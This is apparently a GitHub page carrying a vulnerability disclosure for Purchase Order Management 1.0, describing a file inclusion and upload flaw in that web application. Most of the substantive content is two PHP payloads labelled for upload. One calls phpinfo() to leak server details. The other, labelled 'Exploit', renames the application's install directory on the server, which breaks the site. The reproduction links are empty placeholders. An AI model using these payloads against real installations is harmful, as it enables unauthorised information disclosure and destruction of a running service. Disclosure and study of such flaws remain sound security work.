Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/
CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivilage user interaction

Vendor

Description:

The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities. The users of this system are allowed to submit input into files or upload files to the server. The malicious attacker can get absolute control of this system!

STATUS: CRITICAL Vulnerability

[+]Get Info:

<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

[+]Exploit:

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

Reproduce:

href

Proof and Exploit:

href

Time spend:

00:35:00